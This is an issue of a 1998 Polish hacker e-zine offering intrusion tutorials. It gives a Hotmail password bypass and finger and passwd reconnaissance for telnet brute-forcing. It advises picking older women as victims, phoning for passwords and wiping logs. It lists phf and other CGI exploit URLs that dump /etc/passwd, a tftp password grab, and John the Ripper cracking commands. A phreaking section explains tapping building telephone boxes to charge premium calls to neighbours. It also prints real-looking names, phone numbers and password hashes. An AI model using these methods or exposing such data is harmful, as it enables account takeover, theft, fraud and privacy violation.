hackers mag 4 artykuły HMHYQFQGEMGCXIJHMOGYDHKH2RGMLUIMKFOW5FY


0x01 graphic

*** *** ****** ****** *** *** ******** ******

*** *** ******** ******** *** *** ********* ***

*** *** *** *** *** *** *** *** *** *** ***

*** *** *** *** *** *** *** *** *** ***

************ ********** *** ****** ********* *****

************ ********** *** ****** ****** *****

*** *** *** *** *** *** *** *** *** ***

*** *** *** *** *** *** *** *** *** *** ***

*** *** *** *** ******** *** *** *** *** ***

*** *** *** *** ****** *** *** *** *** *******

***** ***** ****** ******

****** ****** ******** ********

*** *** *** *** *** *** *** ***

*** ****** *** *** *** ***

*** **** *** ********** ***

*** *** ********** *** ****

*** *** *** *** *** ***

*** *** *** *** *** ***

*** *** *** *** ********

*** *** *** *** ******

=============================================================================

Mag na sierpien/wrzesien 1998 Numer 04 http://www.kki.net.pl/hackers

=============================================================================

Spis tresci:

1. Spis tresci

2. Slowo wstepne

3. Hotmail

4. Zdobywanie wielu kont

5. Phreak

6. Linki

7. Redakcja

-----------------------------------------------------------------------------

Wstep:

W poprzenim numerze pytalem ktora wersje (txt czy html) wolicie. Odpowiedzi

ktore nadeszly byly zarowno za wersja txt oraz html (z przewaga glosow za

html), wiec mag nadal bedzie wydawany w obu wersjach. Wersja orginalna zawsze

jest wtorzona w wersji tekstowej a dopiero pozniej przetwarzana na html.

Magazyn jak mozna zauwazyc jest dwu-miesiecznikiem i nic nie wskazuje na to

by sie to zmnienilo.

Richgyver

ps. Programow juz nie bede zamieszczal do magazynu tylko bede je umieszczal

na stronie www (http://www.kki.net.pl/hackers).

-----------------------------------------------------------------------------

Hotmail czesc 1:

Dosc znanym i dosc starym serverem udostepniajacym darmowe konta email jest

http://www.hotmail.com firmy Microsoft. Mozemy zalozyc sobie tam konto email

i miec do niego dostep przy pomocy przegladarki. Oczywiscie aby miec dostep

do swojego emaila musimy wpisac swoje haslo.... ale nie musimy. Jedna z

metod jest wpisanie w pole adresu przegladarki:

http://www.hotmail.com/cgi-bin/start/xxxxxxx

i w miejsce xxxxxx wpisac username (nazwe uzytkownika) czyli alias ktory

wystepuje przed znakiem @ w emailu danej osoby (xxxxxx@hotmail.com).

Czyli np. osoba ma adres email na serwerze hotmail:

zenek@hotmail.com

to wpisujemy w adres (w przegladarce):

http://www.hotmail.com/cgi-bin/start/zenek

Niestety ostatnio firma microsoft zwiekszyla troche zabezpeiczenia i

aby ta metoda dostac sie do konta ofiary musza byc spelnione nastepujace

warunki:

1. ofiara musiala kozystac ze swojego konto w ciagu ostatniej godziny

2. musimy miec ten sam adres IP co ofiara (wiec siedziec albo na tym samym

komputerze co nasza "ofiara" lub uzywac tego samego servera proxy)

Te warunki troche nam zmniejszaja szanase dostania sie ta metoda do konto

naszej "ofiary"... ale nastepne mozliwosc w nastepnym numerze.

Richgyver

-----------------------------------------------------------------------------

Zdobywanie wielu kont:

czesc 2: Analiza zdobytych danych: netstat, finger,

tftp, dziury w scriptach CGI-BIN...

Port surfing, wlamanie z wykorzystaniem

metody brutal force oraz po zlamaniu

hasla ze zdobytego pliku passwd

[ ewentualnie shadow ]...

=============================================================================

Dobra, spotykamy sie juz po raz drugi. Mam nadzieje, ze

kazdy zainteresowany zdobyl juz ( wykorzystujac metody z czesci 1 )

informacje potrzebne nam do tego artykulu. Jest tam duzo

informacji, ktorych sens postaram sie wam dalej wytlumaczyc.

***************************** NETSTAT **********************************

Netstat ( czyli Network Statistic ) daje nam wiele ciekawych

informacji, ktore mozemy wykorzystac potem do surfowania

po portach ( obecnie czesciej wykonuje sie to za pomoca

roznych skanerow, ale "wlasnoreczne" przeszukiwanie daje

nam wiecej satysfakcji :) Zagladamy wiec w plik raportu,

jaki stworzylismy wczesniej ( czesc 1 ). Powinno tam sie

znajdowac cos takiego:

Trying xxx.xxx.xxx.xxx...

Connected to xxx.xxx.xxx.xxx.

Escape character is '^]'.

Active Internet connections (including servers)

Proto Recv-Q Send-Q Local Address Foreign Address (State)

tcp 0 0 *:673 *:* LISTEN

tcp 0 0 *:8080 *:* LISTEN

tcp 0 0 *:netbios-ssn *:* LISTEN

tcp 0 0 *:nntp *:* LISTEN

tcp 0 0 *:auth *:* LISTEN

tcp 0 0 *:sunrpc *:* LISTEN

tcp 0 0 *:pop3 *:* LISTEN

tcp 0 0 *:www *:* LISTEN

tcp 0 0 *:finger *:* LISTEN

tcp 0 0 *:domain *:* LISTEN

tcp 0 0 *:time *:* LISTEN

tcp 0 0 *:smtp *:* LISTEN

tcp 0 0 *:telnet *:* LISTEN

tcp 0 0 *:ftp *:* LISTEN

tcp 0 0 *:chargen *:* LISTEN

tcp 0 0 *:netstat *:* LISTEN

tcp 0 0 xxx.xxx.xxx.xxx:netstat ppp-rapxxx.konin:15558 ESTABLISHED

tcp 0 0 *:daytime *:* LISTEN

tcp 0 0 *:systat *:* LISTEN

tcp 1 0 xxx.xxx.xxx.:systat ppp-rapxxx.konin:15546 TIME_WAIT

tcp 1 0 xxx.xxx.xxx.:systat ppp-rapxxx.konin:15549 TIME_WAIT

tcp 1 1 xxx.xxx.xxx.xxx:1290 ppp-rapxxx.konin.:auth CLOSING

tcp 0 0 *:discard *:* LISTEN

tcp 1 0 xxx.xxx.xxx.xxx:1288 ppp-rapxxx.konin.:auth TIME_WAIT

tcp 0 0 *:echo *:* LISTEN

tcp 1 0 xxx.xxx.xxx.xxx:1286 ppp-rapxxx.konin.:auth TIME_WAIT

tcp 0 0 *:printer *:* LISTEN

tcp 0 0 *:shell *:* LISTEN

tcp 0 0 *:login *:* LISTEN

tcp 0 0 *:2049 *:* LISTEN

udp 0 0 *:671 *:*

udp 0 0 *:netbios-ns *:*

udp 0 0 *:sunrpc *:*

udp 0 0 *:3130 *:*

udp 0 0 *:domain *:*

udp 0 0 localhost:domain *:*

udp 0 0 xxx.xxx.xxx.:domain *:*

udp 0 0 *:time *:*

udp 0 0 *:chargen *:*

udp 0 0 *:daytime *:*

udp 0 0 *:discard *:*

udp 0 0 *:echo *:*

udp 0 0 *:ntalk *:*

udp 0 0 *:syslog *:*

udp 0 0 *:2049 *:*

udp 0 0 *:biff *:*

raw 0 0 *:1 *:*

Active UNIX domain sockets

Proto RefCnt Flags Type State Path

unix 2 [ ] SOCK_STREAM CONNECTED 678

unix 2 [ ] SOCK_STREAM UNCONNECTED 679

unix 2 [ ] SOCK_STREAM CONNECTED 682

unix 2 [ ] SOCK_STREAM UNCONNECTED 687

unix 2 [ ] SOCK_STREAM CONNECTED 690

( wycialem ostatnia kolumne - user [ ale nie bylo w niej nic ciekawego ] )

Sprobujmy wiec przeanalizowac, co tu mamy.

Pierwsza kolumna to ptotokul:

IP - internet protocol, pseudo protocol number

ICMP - internet control message protocol

GGP - gateway-gateway protocol

TCP - transmission control protocol

EGP - exterior gateway protocol

PUP - PARC universal packet protocol

UDP - user datagram protocol

HMP - host monitoring protocol

XNS-IDP - Xerox NS IDP

RDP - "reliable datagram" protocol

( najczesciej jest TCP [ Transmission Control Protocol ], lub UDP [ User

Datagram Protocol ] ), dalej Recived-Q i Sended-Q ( ktore nie sa dla nas

istotne ), Local Adress ( nazwa portu ), Foreign Adress ( adres komputera

laczacego sie z danym portem ), state ( status portu ), user ( uzytkownik )

Podstawowe porty, jakie powinienes znac to:

Nazwa: Nr.portu: Usluga:

echo 7 Cokolwiek napiszesz host odpisze to samo

discard 9 /dev/null

systat 11 Uruchamia na serwerze komende ps -auwwx

daytime 13 Czas i data na hoscie

netstat 15 Wlasnie to uruchomiles :) ( network statistic )

chargen 19 Zwraca nam ciag znakow ASCII. Aby je zatrzymac - ^C

ftp 21 File Transfer Protocol ( wiadomo )

telnet 23 Telnet ( wiadomo )

smpt 25 Poczta ( uzywajac tego portu mozna wysylac fake maile )

time 37 Zwraca czas

domain 53 Nazwa serwera

finger 79 Informacje o uzytkownikach

http 80 Serwer WWW

login 513 Login :)

shell 514 Zdalny shell

Teraz mozesz przeszukac serwer w poszukiwaniu czyis backdoors

lub laczyc sie z odpowiednim portem i probowac zdobyc jak najwiecej

danych. Kiedys mozna bylo wywolac przepelnienie stosu za pomoca

fingera ( wykorzystywala to bakteria Morrisa ) a tym samym zdobyc roota.

[ Wystepowalo to, gdy informacja podawana przez uzytkownika byla

dluzsza niz 512 bajtow. Demon fingerd przepelnial stos i pozwalal

na uruchomienie shella ]

Po polaczeniu na port 79 ( finger ;) mozemy wywolac 1 komende,

po czym zostajemy rozlaczeni. Jest to rownoznacze z wywolaniem:

% finger xxxxx@xxx.xxx.xxx.xxx

( lecz czasem podobno dzialaja takie komendy jak: help, ?, man

mi nie dzialaly, ale tak gdzies czytalem, chcecie to probujcie ;)

[ dla lamerow: ]

[ laczenie z odpowiednim portem: % telnet xxx.xxx.xxx.xxx nr.portu ]

******************************* FINGER **********************************

Teraz znow o FINGERze, ale w nieco innej formie.

Otoz zwraca nam on bardzo ciekawe informacje. W pliku

raport stworzonym po przeczytaniu 1 czesci artykulu powinno

znajdowac sie cos takiego:

....

[kinga.cyf-kr.edu.pl]

Login name: ucjaneck (messages off) In real life: Dariusz Janecki

Bldg: Uniwersytet, Work phone: 633 63 77w.229

Directory: /home/ucjaneck Shell: /usr/bin/tcsh

On since May 16 15:55:23 on ttyp1 from eter213.ch.uj.ed

13 minutes Idle Time

No Plan.

Login name: eyolejni (messages off) In real life: Barbara Olejnik

Bldg: Akademia Ek, Work phone: 616 76 98

Directory: /home/eyolejni Shell: /usr/bin/tcsh

On since May 16 15:51:18 on ttyp4 from pc8-153.ae.krako

2 minutes 31 seconds Idle Time

No Plan.

....

Wszystko jest chyba jasne. Mamy prawdziwe imie i nazwisko

tych ludzi, ich numery telefonow i kilka innych informacji.

Finger jest jednak coraz czesciej wylaczany przez administratorow,

w obawie przed zlymi hackerami i tzw. " system crackers " :)

Jest wiec wykomentowany z inetd.conf:

# finger stream tcp nowait nobody /usr/sbin/tcpd in.fingerd -w

Lub zamieniany na program, ktory po wywolaniu portu 79 zamiast

informacji o uzytkownikach wyswietli nam jakis napisik. Z ciekawszych,

jakie znalazlem to:

....

[giovanni.wmsd.edu.pl]

Sorry, no bonus this time...

[service.amu.edu.pl]

Sorry, finger is locked

[shadow.put.poznan.pl]

Politechnika Poznanska Poznan University of Technology

Uczelniane Centrum Obliczeniowe Computing Centre

------------------------------- --------------------------------

Dostep do tego systemu jest Access to this system is limited

ograniczony wylacznie dla komputerow only for hosts authorized by

autoryzowanych przez Uczelniane Centrum Computing Centre of Poznan

Obliczeniowe Politechniki Poznanskiej University of Technology

unknown@ppp-rapxxx.konin.tpnet.pl :)

nie ma autoryzacji zezwalajacej is not authorized to access

na dostep do systemu orion.put.poznan.pl orion.put.poznan.pl host

hostmaster@orion.put.poznan.pl

....

To ostatnie bylo chyba dzielem jakiegos wrappera ograniczajacego

dostep do tej uslugi ( ale i tak mi sie podobalo :).

Na wielu hostach jednak finger jeszcze dziala i mozna probowac.

********* /etc/passwd ( np. z plikow stworzonych przez monk.sh ) ************

Podobnych informacji co finger moze nam dostarczyc plik /etc/passwd

nawet jesli hasla sa shadowane. Wyglada to tak:

....

stink:x:1048:100:Gary Fisher,,415-306-9466,:/usr/home/stink:/bin/tcsh

....

ion:x:1051:100:Matt Glaspie,ION,810-669-1564,:/usr/home/ion:/bin/sh

....

A wiec otrzymujemy prawie te same informacje, co przy uzyciu fingera:

Login: stink

In real life: Gary Fisher

Organizacja: -

Numer telefonu: 415-306-9466

Katalog macierzysty: /usr/home/stink

Shell: /bin/tcsh

UID=1048

GID=100

Login:ion

In real life: Matt Glaspie

Oranizacja: ION

Numer telefonu: 810-669-1564

Katalog macierzysty: /usr/home/ion

Shell: /bin/sh

UID=1051

GID=100

Widzimy rowniez, ze wszyscy uzytkownicy naleza do grupy o GID=100

W tym przypadku numery telefonow i firma nie maja dla nas

wiekszej wartosci, ale jesli mamy plik passwd z polskiego

serwera, np.

....

pelka:x:558:110:Ania Pelka,OINiD,826-40-47,664-42-79:/home/PELKA:/bin/tcsh

....

kopyszew:x:593:110:Eugeniusz Kopyszew,

UW Wydz.Polonistyki,10-32-31(p.911),10-32-31(p.911):/home/kopyszew:/bin/bash

....

No coz - tutaj chyba wszystko jest jasne...

Do czego moga nam sie przydac informacje zdobyte fingerem ?

Otoz najprostrza forma dostania sie na czyjes konto jest

atak sposobem brutal force ( czyli zgadywanie hasel sposobem

chybil-trafil ). Wbrew pozorom akcja taka ma duze szanse

powodzenia. Wywolujemy wiec klienta telnetu, laczymy sie

z serwerem i mozemy probowac zgadnac haslo wykorzystujac:

login, imie, nazwisko, imie od konca, nazwisko od konca,

polaczenie imienia z nazwiskiem ( 3 litery imienia + 3 nazwiska,

itp. ), wszystko to uzupelnione cyfra 1, 0 ( pozostale

rzadko sie zdarzaja ), lub kilkoma cyframi ( np. 123, 098,

997, 998, 999 ), wykorzystujemy tez numer telefonu i inne

informacje ( strona WWW ). Kiedys udalo mi sie

w ten sposob zlamac kilka kont.

Calosc wygladala mniej wiecej tak:

% telnet

telnet> op xxx.xxx.xxx.xxx

Trying xxx.xxx.xxx.xxx...

Connected to xxx.xxx.xxx.xxx

Escape character is '^]'.

FreeBSD (xxx.xxx.xxx.xxx) (ttyp0)

login: ofiara

Password: / tu wpisywalem hasla

Login incorrect / ale tego nie widac :)

login: ofiara

Password:

Login incorrect

login: ofiara

Password:

Login incorrect

login: ofiara

Password:

Login incorrect

login: ofiara

Password:

Login incorrect

login: ofiara

Password:

Copyright (c) 1980, 1983, 1986, 1988, 1990, 1991, 1993, 1994

The Regents of the University of California. All rights reserved.

FreeBSD 2.2.6-BETA (hoth_ipf) #0: Sun Mar 15 13:03:32 MET 1998

Uzytkownik poprzez zalogowanie sie na swoje konto deklaruje, ze zapoznal

sie z Regulaminem oraz ze wyraza zgode na wszelkie formy monitorowania

swojej dzialalnosci i na wykorzystanie logow systemowych we wszelkich

sprawach administracyjnych, cywilnych i karnych.

Aktualny Regulamin: /regulamin

Zalecenia Bezpieczenstwa: /secure

Komunikaty Administratora: /admin

Welcome to FreeBSD!

You have mail.

tset: terminal type linux is unknown

Terminal type? ^D

Technological progress has merely provided us with more efficient means

for going backwards.

-- Aldous Huxley

xxxx: {1} ls

allegro.cfg mail public_html

xxxx: {2}

To jest zmieniony troche log sesji, a zamiescilem go

po to, aby ukazac, ze zgadniecie czyjegos hasla

jest naprawde mozliwe.

( zalaczam programik, ktory robi to za nas - brute.c )

( uzywamy go ( po kompilacji :) w polaczeniu ze slownikiem )

( $ brute ofiara slownik adres.serwera 23 )

Trzeba natomiast pamietac, ze wszelkie bledne proby logowania

sie zostana odnotowane w logach. Trzeba wiec albo nie przesadzac

z " napastowaniem " serwera ( po 2-3 proby dziennie ), albo

po dostaniu sie do systemu zdobyc roota i wyczyscic logi :)

Inna sprawa jest, ze ludzie sa naiwni i mozna od nich

wyludzic haslo nawet przez telefon :)))

Ja osobiscie nie lubie tego typu atakow, ale w chwili

desperacji ( gdy wszystkie znane dziury w serwerze sa

zapchane ) mozna probowac i tak. Trzeba oczywiscie

dobrac odpowiednio ofiare ( najlepsza jest kobieta,

starsza [ np. bibliotekarka, kustosz muzeum ] )

Naprawde mozna sie wiele dowiedziec o czlowieku przegladajac

strony WWW i laczac znalezione tam informacje np. z FINGERem.

No i trzeba to sprytnie wykorzystac...

Plik passwd mozemy obejrzec majac dostep do systemu za pomoca komendy

cat ( jesli hackujemy pod SHITem 95 mozemy ustawic logowanie

sesji i obejrzec je na spokojnie potem ). Nie chce mi sie tu rozpisywac

na temat sciagania hasel, gdy jestesmy juz w systemie,

bo nie o tym jest artykul. Grunt ze mozna je sciagnac za pomoca ftp

( ale nie anonimowego, bo wtedy glownym katalogiem dla nas nie jest / )

( lecz /home/ftp, tak wiec widziany przez nas plik /etc/passwd )

( to w rzeczywistosci /home/ftp/etc/passwd [ chociaz czasem )

( administratorzy sa na tyle glupi, ze przegrywaja plik /etc/passwd )

( do /home... ] )

% ftp xxx.xxx.xxx.xxx

Connected to xxx.xxx.xxx.xxx

220 xxx.xxx.xxx.xxx FTP server ready.

Name (xxx.xxx.xxx.xxx:twoj_login): nazwa_konta

Password: haslo_dla_tego_konta

ftp> get /etc/passwd /tmp/mam.je.u.siebie

....

ftp> quit

% _

Mozna tez wyslac plik passwd na jakies swoje trefne konto pocztowe.

Itp., itd. - gdy juz mamy konto, sposobow jest naprawde full...

Gdy hasla nie sa shadowane ( co obecnie zadko sie zdarza,

choc jakis miesiac temu znalazlem taki system, [ a tydzien temu drugi :) ])

znajduja sie w pliku /etc/passwd w postaci zakodowanej. Wyglada

to tak:

....

markl:93IGeQL45BmCk:549:100:Mark Lavery:/home/markl:/bin/tcsh

urgent:39Li4tqFigKbA:550:100:Jerry Burger:/home/urgent:/bin/tcsh

getitback:614QgdDEz8N2k:551:100:Gil Ziniga:/home/getitback:/bin/tcsh

....

Gdzie druga czesc linii ( po dwukropku ) to haslo ( zakodowane ).

Aby je zlamac trzeba uzyc programu lamiacego oraz slownika.

Programy takie sa ogolnie dostepne ( najlepsze to:

Cracker Jack, czy John the Ripper ). Dzialaja one

pod DOSem ( chociaz widzialem wersje Johna pod Unixa ).

W celu zlamania hasla musimy miec liste prawdopodobnych hasel

( tzw. slownik ;). Na jakiej zasadzie dziala program lamiacy ?

Zeby to zrozumiec nalezaloby najpierw zastanowic sie

w jaki sposob hasla sa kodowane przez systemy unixowe.

Otoz system koduje haslo ( max. 8 znakowe ) do 4096

wzorcow ( z ktorych kazdy ma po 13 znakow ) i jeden

z takich wzorcow zapisuje w pliku passwd lub shadow.

Mechanizm kodowania hasel jest jednostronny, a to oznacza,

ze hasel tych nie da sie odkodowac. Tak wiec programy

takie jak John The Ripper aby odkodowac haslo potrzebuja

listy slow, ktore kolejno koduja ( uzywajac tych samych

algorytmow co Unix ) do 4096 kombinacji i kolejno

przyrownuja do tego, ktore znajduja w pliku passwd.

Jesli oba zakodowane hasla sa identyczne, oznacza

to, ze znalezlismy haslo ( co sygnalizowane jest

cudownym beeeep z PC-Speaker'a ;)

OK. Jak uzywac Johna, czy Jacka?

Ja osobiscie wole John the Ripper'a (v1.4). Aby go uruchomic przeciwko

plikowi z haslami piszemy najpierw:

C:\JOHN> john.com -beep -single -pwfile:passwd

Co powoduje lamanie hasel bazujac na loginach, imionach i nazwiskach

uzytkownikow ( oraz ich przeksztalceniach ). Wszelkie przeksztalcenia

mozemy ustalic w pliku john.ini. W pliku john.pot znajduja sie

zlamane hasla, a w restore - dane ktore po przerwaniu programu pozwalaja

nam zaczac od ostatniego sprawdzonego slowa [ C:\JOHN> john.com -restore ]

Aby sprawdzic plik passwd z naszym slownikiem uruchamiamy:

C:\JOHN> john.com -beep -pwfile:passwd -wordfile:slownik

Ale lepiej jest odrazu wpisac:

C:\JOHN> john.com -beep -rules -pwfile:passwd -wordfile:slownik

Co spowoduje przeksztalcanie slow z naszej listy ( pierwsza litera

wielka, ostatnia, +cyfry, tworzenie form w czasie przeszlym

( +ed ), liczby mnogiej ( +s ) i inne ). Slowniki mozemy

sobie tworzyc sami, wyciagac slowa z plikow ( program extract.exe

z pakietu Cracker Jacka ), lub sciagnac z jakiejs fajnej strony WWW ;)

Co do Cracker Jacka to sprawa jest duzo prostrza. Piszemy:

C:\CJACK> jack.exe passwd slownik

i dziala. Podobnie jak w Johnie jack.pot - info o zlamanych

haslach, restore - dane do wznowienia sesji.

Acha... wznawianie sesji:

C:\CJACK> jack.exe -restore

Jesli nie mozemy zlamac hasla ( nie mamy go w slowniku nawet

po licznych permutacjach ), a jest ono dla nas bardzo wazne

( np. haslo root'a ), mozemy sprobowac zlamac je metoda

brutal force ( sprawdzic wszelkie mozliwe kombinacje liter ).

Do tego celu mozecie uzyc mojego programiku o nazwie

BrutaLDictor, ktory zalaczam do artykulu ( opis w pliku bdictor.txt )

Gdy program zlamie nam haslo mozemy sie zalogowac

na to konto uzywajac zdobytego hasla.

***************** SCRIPTY CGI-BIN ************************

Ciekawsza rzecza jest zdobycie pliku z haslami bez dostepu

do konta w systemie. Mozna to np. zrobic wykorzystujac

dziury w scriptach CGI-BIN z HTTPD. Sa one dosc stare i bardzo

rzadko dzialaja :(

I znow mozemy zdobyc albo plik z haslami zakodowanymi,

albo z "x" lub "*" w miejscu hasel ( oznacza to, ze

hasla sa shadowane i znajduja sie najczesciej w pliku

/etc/shadow, ale np. na FreeBSD 2.2.6 sa w /etc/master.passwd,

ich lokalizacje w roznych systemach podam na koncu artykulu ).

A oto kilka bardziej znanych dziur w tych scriptach.

Przypominam, ze uruchamiamy je z poziomu przegladarki

( np. IE czy Netscape pod Windowsem, czy lynx pod linuxem ).

Wiec wyglada to tak:

1). http://xxx.xxx.xxx.xxx/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd

gdzie:

Linie rozpoczynamy od: %0a

Zamiast spacji wstawiamy: %20

Mozemy w ten sposob uruchomic dowolna komende unixa, np.

http://xxx.xxx.xxx.xxx/cgi-bin/phf?Qalias=x%0aid

http://xxx.xxx.xxx.xxx/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/services

http://xxx.xxx.xxx.xxx/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/ident.conf

http://xxx.xxx.xxx.xxx/cgi-bin/phf?Qalias=x%0a/bin/cat%20/var/log/messages

http://xxx.xxx.xxx.xxx/cgi-bin/phf?Qalias=x%0a/bin/cat%20/var/log/syslog

i inne w celu lepszego zapoznania sie z serwerem.

Nie mozna jednak uzywac mechanizmu potokow (|), przepisywac shelli,

dodawac + + do .rhosts , itp.

Pamietac nalezy rowniez, ze nasza dzialalnosc jest odnotowywana

w logach.

Dalszy komentarz jest chyba zbedny - wyswietlaja plik /etc/passwd :)

[ oczywiscie w ten sposob mozna obejrzec dowolny plik na serwerze ]

2). http://xxx.xxx.xxx.xxx/cgi-bin/php.cgi?/etc/passwd

3). http://xxx.xxx.xxx.xxx/cgi-bin/view-source?../../../../../../etc/passwd

4). http://xxx.xxx.xxx.xxx/cgi-bin/campas?%a/bin/cat%0a/etc/passwd

A te dzialaja na serwerach opartych na IRiX'ie:

5). http://xxx.xxx.xxx.xxx/cgi-bin/wrap?/etc / pokazuje zawartosc

/ katalogu /etc

/ i analogicznie inne

6). http://xxx.xxx.xxx.xxx/cgi-bin/webdist?distloc=;cat%20/etc/passwd

7). http://xxx.xxx.xxx.xxx/cgi-bin/handler/useless_shit;cat

/etc/passwd|?data=Download

W ten sam sposob mozna probowac sciagnac /etc/shadow, ale

szanse male.

Do tego artykulu dodam przerobiona przeze mnie wersje

scriptu monk.sh z pakietu XENOLITH. Testuje ona

wszyskie wymienione wyzej dziury.

( nazwa: cgitest )

( uruchomienie: % cgitest lista.serwerow )

********************* TFTP *****************************

W pliku z raportem z polaczen z TFTP zapewne nie znajdziesz

duzo. Jesli jednak znajdziesz serwer, z ktorym mozesz

sie polaczyc na port 69, uruchom klienta tftp i sprobuj

sciagnac plik passwd.

% tftp

tftp> connect xxx.xxx.xxx.xxx

tftp> get /etc/passwd /tmp/mam.je.u.siebie

tftp> quit

Jesli operacja taka sie powiedzie ( nie sa nalozone restrykcje

co do katalogu ) - masz hasla.

=============================================================================

W nastepnym numerze:

Sendmail, NFS, informacje z portu 11 ( systat ) i moze cos jeszcze ;)

=============================================================================

Pozdrowienia dla: KeenU'a, Kubi'ego, Dante, Sir D, BoBo i pozostalych.

" Nil mortalibus ardui (e)st... " - Horacy

arkth

-----------------------------------------------------------------------------

Phreak:

Chcialem na poczatku wyjasnic, coz to takiego oznacza slowo "PHREAK".

Oznacza to po prostu proby/czynnosc zwiazane z mozliwosciami dzwonienia przez

telefon i nie placac za to. Jest wiele sposobow na wykonywanie ww. czynnosci.

Kiedys (jakies dziesiec lat temu) bylo to dosc proste, dzis Telekomunikacja

Polska przeznacza dosc duze pieniadze na to by kazdy placil wszystkie rozmowy

telefoniczne. Ale tu nic na razie o tym nie bedzie, chcialbym tu napisac jak

TPSA (Telekomunikacja Polska Spolka Akcyjna) dba o to aby za kazda wykonana

rozmowe ktos zaplacil (ale kto to juz ich nie interesuje).

Otoz jak ktos nie ma co robic z pieniedzmi to moze sobie podlaczyc do

domu dwie linie telefoniczne (dwa numery telefoniczne). Jednym z takich ludzi

jestem ja (choc nie mam za duzo pieniedzy). Chodzi o to, ze ten drugi telefon

jest podlaczony do takiej malej skrzynki, ktora znajduje sie na mojej klatce

schodowej. Wszystko niby dobrze tylko po pewnym czasie na tej lini slyszalem

straszne trzaski, wiec dzwonie do TPSA, a na drugi dzien przyszedl jakis

facet. I co? I ten nie pozorny facet wzial srubokret, odkrecil dwie skrobki,

podlaczyl dwa kabelki do swojej sluchawki i juz dzwonil na moj koszt. Czyli

mogl kazdy przyjsc w nocy, zrobic to samo i dzwonic sobie na numery typu

0700 na moj koszt. Dwie plastikowe srobki to jest zabezpieczenie przed utrata

tysieczy zlotych jakie w taki sposob mozna komus nabic na liczniku w TPSA?

Co z tego wynika, to ze: nie nalezy dokladac sobie nowych lini telefonicznych

(jesli ktos mieszka w bloku) oraz gdy chcemy sobie podzwonic na numer numery

0700 to nalezy tylko poszukac takiej skrzynki i podlaczyc tam sluchawke.

Kiedys slyszalem w "informacjach" telewizyjnych, ze ktos sadowal sie z TPSA

wlasnie o to czy ww. typ skrzynki byl dobrze zabezpieczony (ktos mu nabil

licznik telefoniczny), podobno TPSA przegrala sprawe. To tyle na dzis.

nikito

-----------------------------------------------------------------------------

Linki do interesujacycg stron:

-strony zwiazane z h/p/c/v/a

-http://www.kki.net.pl/hackers

-http://www.inet.com.pl/rafal

-http://hack.netpol.pl

-http://kki.net.pl/glider

-http://www.kki.net.pl/~masher

Twoja strona tez moze znalezc sie w tym spisie. Musisz najpierw:

1. Umiescic ten "kawalek" kodu html na swojej stronie:

<-- Poczatek odnosnika do hackersmag -->

<-- Koniec odnosnika -->

2. Napisac do nas email (zadresowany do hackers@kki.net.pl) z informacja

o adresie twojej strony.

Jesli wszystko zrobiles poprawnie twoja strona zostanie umieszczona w naszym

spisie najciekawszych stron.

-----------------------------------------------------------------------------

W sklad redakcja tego maga wchodza:

-Richgyver (hackers@kki.net.pl)

-Lukas (chopin@friko.onet.pl)

-Arkth (arkth@friko4.onet.pl)

-nikito (superc@friko.sos.com.pl)

Jesli chcial cos napisac do naszego maga (a nam to sie by spodobalo)

lub napisales juz jakis tekst to wyslij to na adres: hackers@kki.net.pl

ze swoimi danymi. Kazdy taki piszacy do naszego maga dostanie wynagrodzenie

(pieniadze).

Zawsze wszystkie numery poprzednie oraz najnowszy numer naszego magazynu

mozesz sciagnac ze strony: http://www.kki.net.pl/hackers

Mozesz do nas napisac list, nasz email: hackers@kki.net.pl

Wszystkie materialy i informacje zawarte sa tu jedynie w celach

*EDUKACYJNYCH* i nikt z redakcji nie ponosi *ZADNEJ* odpowiedzialnosci, za

zle wykorzystanie podanych tu informacji...

/Koniec pliku tekstowego./



Wyszukiwarka

Podobne podstrony:
hackers mag artykuł VVK7H5T77ZJ4C7C5DTYSZFZCW6B5COREEWGAJJA
hackers mag 3 artykuły CTSHG2C2LSIBXJ3HT77334MQGH72IQ4QEI5H3QY
hackers mag 5 artykuły GKENU6GECHM5O43J2B7AVI3CQSJW37RBVYUZ7SY
hackers mag 2 artykuł HVAYWRJIKB6SKZQQDG3ILL4B6GATL73GFL6AEMQ
dodatkowy artykul 2
ARTYKUL
laboratorium artykul 2010 01 28 Nieznany
Fizjologia snu Artykul
Praca mag Promocja a kształtowanie wyobraźni ekonomicznej (2)
energoefekt artykul transmisja danych GPRS NiS[1]
Komunikacja interpersonalna Artykul 4 id 243558
artykul profilaktyka cz2 id 695 Nieznany (2)
kryteria oceny podręczników artykuł
Artykul (2015 International Jou Nieznany
ARTYKUL Mieszanki niezwiazane na podbud
artykul bromy id 69542 (2)
archetypy w reklamie artykul ma Nieznany (2)
Medyczny artykuł naukowy Zasady dobrej praktyki publikacyjnej [J E Zejda]

więcej podobnych podstron